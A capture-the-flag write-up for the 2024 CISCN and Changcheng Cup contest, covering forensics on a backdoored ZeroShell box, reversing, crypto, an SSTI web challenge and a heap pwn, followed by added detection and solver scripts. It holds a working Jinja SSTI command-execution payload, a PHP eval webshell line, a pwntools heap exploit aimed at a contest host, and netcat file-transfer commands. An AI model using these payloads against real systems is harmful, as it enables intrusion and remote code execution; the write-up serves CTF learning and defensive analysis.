SfTian 2024 CISCN&长城杯 WP

# 2024 CISCN&长城杯 WP

> A fine competition for the people

## 01 zeroshell_1

### Steps:

Extract the archive; it contains a packet capture. In the HTTP traffic, one request has a Referer header whose value is base64. Decoding it with CyberChef gives the flag.

### Flag:

flag{6C2E38DA-D8E4-8D84-4A4F-E2ABD07A1F3A}

## 02 zeroshell_2

### Steps:

ZeroShell 3.9.0 has a public CVE. The exploit-db Ruby module together with msfconsole gives a reverse shell, and the flag is found in /Database.

### Flag:

flag{c6045425-6e6e-41d0-be09-95682a4f65c4}

## 03 zeroshell_3

### Steps:

`netstat -lnp` shows an IP address beginning with 202.

### Flag:

flag{202.115.89.103}

## 04 zeroshell_4

### Steps:

`ls -al` in the /Database directory reveals a hidden file named .nginx.

### Flag:

flag{.nginx}

## 05 zeroshell_5

### Steps:

Run `nc <nc IP> <nc port> < .nginx` on the box, with the file as stdin, and `nc -lnvp <port> > back` on the receiving side, with stdout redirected into a file, to pull the binary across. Opening it in IDA shows the key in plaintext.

### Flag:

flag{11223344qweasdzxc}

## 06 zeroshell_6

### Steps:

After .nginx runs there is a looping keep-alive process in /tmp, so something must reference .nginx. Searching with grep turns up the keep-alive script (eventually found under /var):

```
grep -r ".nginx" /var
```

### Flag:

flag{/var/register/system/startup/scripts/nat/File}

## 07 WinFT_1

### Steps:

`netstat -ant` straight from PowerShell; see the screenshot.

### Flag:

flag{miscsecure.com:192.168.116.130:443}

## 08 WinFT_2

### Steps:

In Task Scheduler, as shown in the figure below.

### Flag:

flag{AES_encryption_algorithm_is_an_excellent_encryption_algorithm}

## 09 WinFT_5

### Steps:

The capture contains a server response that is comparatively large. foremost carves a zip straight out of it, and the password happens to be the base64 string from the challenge description.

### Flag:

flag{a1b2c3d4e5f67890abcdef1234567890-2f4d90a1b7c8e2349d3f56e0a9b01b8a-CBC}

## 10 sc05_1

### Steps:

Inferred by feel (just luck): at 2024/11/09 16:22:42 two connections are established at the same moment, one of them to the United States. MD5 it and the flag comes out.

### Flag:

flag{01df5bc2388e287d4cc8f11ea4d31929}

## 11 ezCsky

### Steps:

Load the binary into IDA with the ARM processor module. A `testkey` string is right there in the stack area, and scrolling up shows an `rc4_crypt` function. On the left there is an xor function; jumping to "You enter a true flag!" shows the big-endian data below it, which is the ciphertext. The xor logic was not obvious, so several variants were tried; it turned out to be a chained xor that has to be undone in reverse order.

```python
from Crypto.Cipher import ARC4

key = b"testkey"
enc = [0x96, 0x8F, 0xB8, 0x08, 0x5D, 0xA7, 0x68, 0x44, 0xF2, 0x64, 0x92, 0x64,
       0x42, 0x7A, 0x78, 0xE6, 0xEA, 0xC2, 0x78, 0xB8, 0x63, 0x9E, 0x5B, 0x3D,
       0xD9, 0x28, 0x3F, 0xC8, 0x73, 0x06, 0xEE, 0x6B, 0x8D, 0x0C, 0x4B, 0xA3,
       0x23, 0xAE, 0xCA, 0x40, 0xED, 0xD1]

res = ARC4.new(key)
flag = res.decrypt(bytes(enc))
flag = bytearray(flag)
# undo the chained xor from the end: each byte was xored with its right-hand neighbour
for i in range(len(flag) - 1, 0, -1):
    flag[i - 1] ^= flag[i]
print(flag)
```

### Flag:

flag{d0f5b330-9a74-11ef-9afd-acde48001122}

## 12 Safe_Proxy

### Steps:

SSTI template injection with fenjing. The payload is sent as a POST parameter:

```
code={%25set+gl%3d'_'*2%2b'globals'%2b'_'*2%25}{%25set+bu%3d'_'*2%2b'builtins'%2b'_'*2%25}{%25set+im%3d'_'*2%2b'i''mport'%2b'_'*2%25}{%25set+hc%3d'so'[%3a%3a-1]%25}{{g.pop[gl][bu][im](hc)['p''open']('cat+/f*>>app.py').read()}}
```

This appends the flag file to the end of app.py; visiting app.py again returns the flag.

### Flag:

flag{3bccc0f4-dfca-43be-93ba-4a2c587bb230}

## 13 hello_web

### Steps:

The page says "please ignore the text at the bottom of this page", followed by `SSd2ZSBsZXQgeW91IGlnbm9yZSB0aGlzIHBhcmFncmFwaC4=`, which base64-decodes to "I've let you ignore this paragraph." So the page must hold a hint. F12 shows two pages in the source: hackme.php and a hint page. Reading both through the file inclusion, one is a PHP file and the other a phpinfo page. The PHP file is an obfuscated webshell; decoding it layer by layer, the innermost function is:

```
@eval($_POST['cmd[66.99']);
```

So the connection password is `cmd[66.99`. AntSword connects, but commands do not execute: the phpinfo page shows that disable_functions blocks most of the command-execution functions. AntSword's disable_functions bypass plugin gets around that and commands run. Locate the flag with find and read it:

```
find / -name "flag"
```

### Flag:

flag{7fa13711-118e-46ba-97c0-1d412e0d9128}

## 14 fffffhash

### Steps:

The original challenge is on GitHub: https://github.com/DownUnderCTF/Challenges_2023_Public/blob/main/crypto/fnv/solve/solution_joseph_LLL.sage. Swap in this challenge's data and run it; it yields 020101081b04390001051a020a3d0f0f, which verifies against the hash and gives the flag.

### Flag:

flag{7ba210c2-f03b-4c48-b5d3-c523f20dd078}

## 15 rasnd

### Steps:

The encryption has two stages.

1. crypto1(): brute-force x1 and x2 until the GCD of the computed A and n is prime; that GCD is one prime factor of n, which gives p and q. Use them to compute the private exponent d and decrypt the first half of the flag.
2. crypto2(): first use z3 to solve the equations for p and q, then it is just textbook RSA decryption: compute the private exponent d and decrypt the second half of the flag.

```python
from Crypto.Util.number import *
from tqdm import trange

n = 18525513846506175831563759729334399107321460844233190994505090498783093351218530201460704018557718111910673563688865854955581238994847476035163061047080472844913738288191312241552652474564445302264853029924473499855798791895312908454274485506859061410335361020340776516523941545295495868148602830773643381026875615116114542987487721476433319065336287426267130761480149666380372502030176504260183872783044582472269370191940246989122422751136739615150004325135453824753194384675391111774569167783712462987269409467429479975117050818132845256522076975610334620671183269663182420173716768424637453841150288101932060282283
c = 12092565061875126203146777419524136209293991008847517402367020050067538584421589817896823780450281632257888908525282005401908471053590578919304330901227398490964076046082605352067571504589311506387879145663200685627203086383618876385605299802465546763321856181104635248909007918883511842314387859167479153141071518807976310800715800912922434598966639864227351934779100082251869201327419635778335845542734204635212776352380693446974665264431424098740050582266977513900719650125894714642363459340749031503451895968021061519344479725422682328308860148967765021704752730969629515036468587706756828693721479809573953211546
hint1 = 2117789396284928955538494629631830279901722075033344485242708796186506061701545362910544780349396590511342342718717569060549269313648469145642279444412904836667483251061673671890825127651416884926163439778819049928663917725126750595616039237178509344130451335391573262418766865178758129361354714489989500910936378069324756437725394481358310486
hint2 = 46121617974271967295736135112108716088905050360890819930061863458876456744303751629131134572211333291140404662021435889585110481641631066780733392452056644837591340160196351753203344592866475775323730060605004624386976329104900761858010706810631187690819400479350763557994471428570772169051962332816193904205416366733136879488772782088175485170448040123098716142380888785303020040810614219283904840800722864380060942399013241389546657840464823687291133552909223

# brute-force the small multipliers until gcd(A, n) is a prime factor of n
for x1 in trange(2**11):
    for x2 in range(2**11):
        A = x2 * (hint1 + 0x114) - x1 * (hint2 + 0x514)
        if isPrime(GCD(A, n)):
            p = GCD(A, n)
            q = n // p
            d = inverse(0x10001, (p - 1) * (q - 1))
            print(long_to_bytes(pow(c, d, n)))
```

```python
# Second stage; SageMath syntax (var, solve, inverse_mod are Sage builtins), run with sage
from Crypto.Util.number import *

n = 14581302691212555916083278502439645397238041370035475406126779344600639511143637322640320059430681830741413923894847426573750476698631629568629943135933920419347385832842354697374392989498131828072255450489481812778462977795579457613927824857209254566726209492511234506015225747956122726427272833154780220922151818667181643912754901418400655002805374255806121525842789597175219371921475576854225287577771787933982552125308158761528067432089549432127334340794790636977802392329593399162215706992811893095544527916459441198849281399851917775639982097051030136092694673405355827098368834474621264863247192824991842196297
c = 7954440013989245337910262430666287958436558133407459521845218063677314992811762649775906648010196422215021709717265025510455096691766378284665144146974890935553663566707049651117885477633018754683655768376560232158346641475771046990495669325468862166854737396238730263702822647267035153141131892750027678869967403663512868816752965265579970395746897380562512210634391316205808723256530408742805569849728321765600049427135123310821237452488717921455866043199092062704144480995088370641048502818060719065673619630371468661427335404193388562052645963776592754837449601118777623355449397232080478410800515409039281165247
hint = 12768520294607859083739478491354425588086046535894996297736127849435001668613589303105888944036526154850461105541323836773875591747775277021758182627744342384678026282358678053903109701939900236929560121288711856679838848949501610151272181253618726858545924000071463365017696805999401206276483675576263580816343280415962125426066267656836814383033878533310767612179612995463625217364168542747591339975385150641462726311634726990311475198772817439564026165704028636642518327311597477899223257607802992771286324926488802818728414152925384296458068643632845807225606232886858071179561327111145035640807940505391622733429

var('p q')
eq1 = 514 * p - 114 * q - inverse_mod(hint, n)   # the leaked linear relation between p and q
eq2 = p * q - n
solns = solve([eq1, eq2], p, q, solution_dict=True)[0]
p = solns[p]
q = solns[q]
d = inverse_mod(0x10001, (p - 1) * (q - 1))
print(long_to_bytes(int(pow(c, d, n))))
```

### Flag:

flag{bfcab7e9-c9df-4f70-9e1a-b58f5b157c91}

## 16 dump

### Steps:

Viewing the flag file in 010 Editor gives the encrypted bytes. The binary cannot be debugged dynamically, so run `.\re.exe flag` directly to see the hex the program produces for it. That makes it possible to feed the program an ordered alphabet (a-z, A-Z, 0-9, plus `=` and the braces) and match the resulting hex against the bytes in the flag file:

```
.\re.exe abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789={}
1e1f202122232425262728292a2b2c2d2e2f303132333435363702030405060708090a0b0c0d0e0f101112131415161718191a1b001c1d0000000000000001
```

A short script then maps each byte back to its character; wrap the result in flag{} yourself.

```python
import string

ans = '23291e24380e1520370e0520000e37121d0f24010139'
dic = string.ascii_letters + string.digits + "=" + "{}"
print(dic)
key_dict = "1e1f202122232425262728292a2b2c2d2e2f303132333435363702030405060708090a0b0c0d0e0f101112131415161718191a1b001c1d0000000000000001"

# build the byte -> character table from the run over the known alphabet
mapper = {}
for i in range(len(dic)):
    char = dic[i]
    key = key_dict[i * 2:i * 2 + 2]
    mapper[key] = char

# translate the bytes of the encrypted flag back through the table
flag = ''
for i in range(len(ans) // 2):
    key = ans[i * 2:i * 2 + 2]
    if key in mapper:
        flag += mapper[key]
print(flag)
```

### Flag:

flag{MTczMDc9MzQ2Ng==}

## 17 anote

### Steps:

An absurd C++ binary, but the only protection enabled is Canary. It is a heap challenge: the classic add/edit UAF is used to build a heap overflow. Since printf prints pointers directly and leaks heap addresses, the backdoor address can be placed where the control-flow hijack lands and a forged chunk overwrites it, giving arbitrary code execution.

```python
from pwn import *

context(log_level='debug', arch='amd64')
io = remote('47.94.85.236', 36964)

io.sendlineafter(b'Choice>>', b'1')
io.sendlineafter(b'Choice>>', b'1')
io.sendlineafter(b'Choice>>', b'2')
io.sendlineafter(b'index: ', str(0))
# the printed pointer leaks the heap address
io.recvuntil(b'gift: ')
heap = int(io.recv(9), 16)
print('heap => ' + hex(heap))

io.sendlineafter(b'Choice>>', b'3')
io.sendlineafter(b'index: ', str(0))
io.sendlineafter(b'len: ', str(40))
backdoor = 0x80489CE
io.sendlineafter(b'content: ', p32(backdoor) + p32(0) * 4 + p32(0x21) + p32(heap + 8))

io.sendlineafter(b'Choice>>', b'3')
io.sendlineafter(b'index: ', str(1))
io.sendlineafter(b'len: ', str(40))
io.sendlineafter(b'content: ', p32(heap + 0x8))
io.interactive()
```

### Flag:

flag{43a6ad43-55fb-4a88-bc23-8a3918e7b39c}
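The zeroshell_1 step above relies on spotting a base64 blob smuggled in a Referer header. The following is an added example, not part of the write-up: a small parser that splits a raw HTTP request into headers and reports any header whose value is base64 that decodes to printable text, which is the generic form of that check. The request text and the marker string are constructed here; the request path and host are placeholders, not the challenge's values.

```python
import base64
import re
import string

# Constructed marker; the real capture carried the flag, this sample carries a stand-in.
MARKER = b"hidden-constructed-marker-text"

# Constructed sample request, modelled on the zeroshell_1 finding (not the real capture).
SAMPLE_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "User-Agent: curl/7.68.0\r\n"
    "Referer: " + base64.b64encode(MARKER).decode() + "\r\n"
    "Accept: */*\r\n"
    "\r\n"
)

# A run of 16+ base64 alphabet characters with optional padding.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
PRINTABLE = set(string.printable)


def parse_headers(raw):
    """Split a raw HTTP request into (request_line, {name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip()] = value.strip()
    return lines[0], headers


def decode_if_base64(value):
    """Return the decoded text if value is base64 that decodes to printable ASCII, else None."""
    if not B64_RE.match(value):
        return None
    try:
        decoded = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    if all(ch in PRINTABLE for ch in decoded):
        return decoded
    return None


def find_encoded_headers(raw):
    """Return [(header_name, decoded_text)] for headers carrying printable base64 payloads."""
    _, headers = parse_headers(raw)
    hits = []
    for name, value in headers.items():
        decoded = decode_if_base64(value)
        if decoded is not None:
            hits.append((name, decoded))
    return hits


if __name__ == "__main__":
    for name, decoded in find_encoded_headers(SAMPLE_REQUEST):
        print(f"{name}: {decoded}")
```

Run over every request in a capture, this flags the same class of header abuse without opening each packet by hand; values such as `192.0.2.10` or `curl/7.68.0` fail the alphabet check and are never decoded.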
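zeroshell_4 and zeroshell_6 are two halves of one hunt: a hidden dotfile that is really an ELF binary, and the startup script that keeps it alive. This added example (not the write-up's code) automates both checks against a throwaway directory tree built to imitate the layout described above; the tree, the fake ELF header and the script text are all constructed here.

```python
import os
import tempfile

ELF_MAGIC = b"\x7fELF"


def find_hidden_elf(root):
    """Walk root and return paths of dotfiles whose first bytes are the ELF magic."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.startswith("."):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(4)
            except OSError:
                continue
            if head == ELF_MAGIC:
                hits.append(path)
    return hits


def find_references(root, needle, max_size=1_000_000):
    """Return paths of files under root that mention needle (a grep -r equivalent)."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_size:
                    continue
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            if needle.encode() in data:
                hits.append(path)
    return hits


def build_constructed_tree():
    """Create a throwaway directory imitating the layout from the write-up (constructed)."""
    root = tempfile.mkdtemp(prefix="zeroshell_hunt_")
    db = os.path.join(root, "Database")
    scripts = os.path.join(root, "var", "register", "system", "startup", "scripts", "nat")
    os.makedirs(db)
    os.makedirs(scripts)
    with open(os.path.join(db, ".nginx"), "wb") as fh:
        fh.write(ELF_MAGIC + b"\x01\x01\x01" + b"\x00" * 57)  # fake ELF header only
    with open(os.path.join(db, ".profile"), "w") as fh:
        fh.write("# ordinary dotfile, not a binary\n")
    with open(os.path.join(scripts, "File"), "w") as fh:
        fh.write("#!/bin/sh\nwhile true; do /Database/.nginx; sleep 60; done &\n")
    return root


def hunt(root):
    """Map each hidden ELF under root to the startup scripts under var/ that reference it."""
    report = {}
    for binary in find_hidden_elf(root):
        refs = find_references(os.path.join(root, "var"), os.path.basename(binary))
        report[binary] = refs
    return report


if __name__ == "__main__":
    root = build_constructed_tree()
    for binary, refs in hunt(root).items():
        print(binary, "referenced by:", refs)
```

Pointing `hunt()` at a mounted image root instead of the constructed tree gives the same report for a real box; the ordinary `.profile` dotfile is skipped because its header is not ELF.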
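For ezCsky, the write-up recovers the order of operations by trial. This added example (not from the write-up) spells out the whole scheme in both directions with a hand-written RC4, so the reverse-order xor is no longer a guess: the forward transform xors each byte with its right-hand neighbour and then applies RC4, and the inverse must walk from the end so each neighbour is restored before it is used. The round-trip and a published RC4 test vector are the checks; the ciphertext from the write-up is also run through it.

```python
def rc4(key, data):
    """Plain RC4 keystream xor (symmetric: the same call encrypts and decrypts)."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def chain_xor(data):
    """Forward transform: every byte is xored with its right-hand neighbour; the last byte is kept."""
    buf = bytearray(data)
    for i in range(len(buf) - 1):
        buf[i] ^= buf[i + 1]                   # buf[i + 1] is still the original value here
    return bytes(buf)


def unchain_xor(data):
    """Inverse: walk from the end so each neighbour is already restored before it is used."""
    buf = bytearray(data)
    for i in range(len(buf) - 1, 0, -1):
        buf[i - 1] ^= buf[i]
    return bytes(buf)


def encrypt(key, plaintext):
    """The challenge's order as reconstructed from the solve script: chain xor, then RC4."""
    return rc4(key, chain_xor(plaintext))


def decrypt(key, ciphertext):
    """RC4 first, then undo the chain from the end."""
    return unchain_xor(rc4(key, ciphertext))


# Ciphertext and key as given in the ezCsky write-up.
CHALLENGE_KEY = b"testkey"
CHALLENGE_ENC = bytes([0x96, 0x8F, 0xB8, 0x08, 0x5D, 0xA7, 0x68, 0x44, 0xF2, 0x64, 0x92, 0x64,
                       0x42, 0x7A, 0x78, 0xE6, 0xEA, 0xC2, 0x78, 0xB8, 0x63, 0x9E, 0x5B, 0x3D,
                       0xD9, 0x28, 0x3F, 0xC8, 0x73, 0x06, 0xEE, 0x6B, 0x8D, 0x0C, 0x4B, 0xA3,
                       0x23, 0xAE, 0xCA, 0x40, 0xED, 0xD1])

if __name__ == "__main__":
    print(decrypt(CHALLENGE_KEY, CHALLENGE_ENC))
```

Why the forward loop must run upwards and the inverse downwards: in `chain_xor` the neighbour read at step i has not been modified yet, so the output is out[i] = in[i] ^ in[i+1]; reversing that requires in[i+1] first, which is only available once the tail has been restored.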
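The hello_web step peels an obfuscated webshell by hand down to `@eval($_POST['cmd[66.99']);`. As an added example (not the write-up's code), here is a scanner that does that peeling automatically: it finds `eval(...)` wrapped in the usual decoder chain (`base64_decode`, `gzinflate`, `str_rot13`), decodes layer by layer, and reports any layer that evals a request parameter. The sample shell is constructed in code around that exact inner line so no encoded blob has to be trusted.

```python
import base64
import codecs
import re
import zlib

# eval( decoder( decoder( '<literal>' ) ) )  -- group 1 is the decoder chain, group 2 the literal
WRAPPER_RE = re.compile(
    r"eval\s*\(\s*((?:(?:base64_decode|gzinflate|str_rot13)\s*\(\s*)+)['\"]([^'\"]+)['\"]\s*\)+"
)
DECODER_RE = re.compile(r"base64_decode|gzinflate|str_rot13")
# eval($_POST['name']) and friends: the sink a one-line shell ends in
SINK_RE = re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[\s*['\"]([^'\"]+)['\"]\s*\]")

DECODERS = {
    "base64_decode": lambda s: base64.b64decode(s).decode("latin-1"),
    "gzinflate": lambda s: zlib.decompress(s.encode("latin-1"), -15).decode("latin-1"),
    "str_rot13": lambda s: codecs.decode(s, "rot_13"),
}


def peel_layers(source, max_depth=10):
    """Return [source, layer1, layer2, ...], each layer the decoded payload of the previous eval."""
    layers = [source]
    for _ in range(max_depth):
        m = WRAPPER_RE.search(layers[-1])
        if not m:
            break
        names = DECODER_RE.findall(m.group(1))
        payload = m.group(2)
        try:
            for name in reversed(names):       # innermost decoder runs first
                payload = DECODERS[name](payload)
        except (ValueError, zlib.error):
            break
        layers.append(payload)
    return layers


def scan(source):
    """Return findings for every layer that evals a request parameter."""
    findings = []
    for depth, text in enumerate(peel_layers(source)):
        for m in SINK_RE.finditer(text):
            findings.append({"depth": depth, "superglobal": m.group(1), "parameter": m.group(2)})
    return findings


def build_constructed_sample():
    """Constructed webshell: the write-up's inner line wrapped in gzinflate(base64_decode())."""
    inner = "<?php @eval($_POST['cmd[66.99']); ?>"
    comp = zlib.compressobj(wbits=-15)          # raw deflate, what PHP's gzinflate expects
    raw = comp.compress(inner.encode()) + comp.flush()
    b64 = base64.b64encode(raw).decode()
    return f"<?php eval(gzinflate(base64_decode('{b64}'))); ?>"


if __name__ == "__main__":
    for finding in scan(build_constructed_sample()):
        print(finding)
```

A file that merely calls `base64_decode` to print something produces no finding, because the sink pattern needs `eval` of a superglobal; the depth field tells the analyst how many wrappers hid it.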
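The crypto2() stage of rasnd hands the solver a `hint` with `inverse_mod(hint, n) = 514*p - 114*q`, and the write-up lets a symbolic solver find p and q. This added example (not the write-up's code) shows why that leak is fatal with plain integer arithmetic: substituting q = n/p turns the relation into the quadratic A*p^2 - k*p - B*n = 0, whose discriminant is the perfect square (A*p + B*q)^2. The primes below are small constructed values, not the challenge's; the crypto1() hints are not reproduced because the page does not say how they were generated.

```python
from math import isqrt

A, B = 514, 114   # coefficients of the challenge relation: inverse(hint) = A*p - B*q (mod n)


def make_constructed_instance():
    """Small constructed parameters (not the challenge's): two known primes and the hint."""
    p, q = 1000000007, 998244353
    n = p * q
    k = A * p - B * q                # positive for these primes, coprime to n
    hint = pow(k, -1, n)             # what the challenge hands out
    return n, hint, p, q


def recover_factors(n, hint):
    """Invert the hint, then solve A*p^2 - k*p - B*n = 0 exactly over the integers."""
    k = pow(hint, -1, n)
    disc = k * k + 4 * A * B * n     # (A*p - B*q)^2 + 4*A*B*p*q == (A*p + B*q)^2
    s = isqrt(disc)
    if s * s != disc:
        raise ValueError("discriminant is not a perfect square; relation does not hold")
    p, rem = divmod(k + s, 2 * A)    # positive root: (k + s) / (2A) == 2*A*p / (2A)
    if rem or n % p:
        raise ValueError("no integer root divides n")
    return p, n // p


def rsa_private_exponent(p, q, e=0x10001):
    """Textbook RSA: d = e^-1 mod (p-1)(q-1), the step the write-up performs after factoring."""
    return pow(e, -1, (p - 1) * (q - 1))


if __name__ == "__main__":
    n, hint, p, q = make_constructed_instance()
    rp, rq = recover_factors(n, hint)
    d = rsa_private_exponent(rp, rq)
    m = 123456789
    print("recovered p, q:", rp, rq)
    print("round trip ok:", pow(pow(m, 0x10001, n), d, n) == m)
```

The same formula works for the challenge-sized modulus because `isqrt` is exact on arbitrary-precision integers; no solver is needed once the relation is linear in p and q.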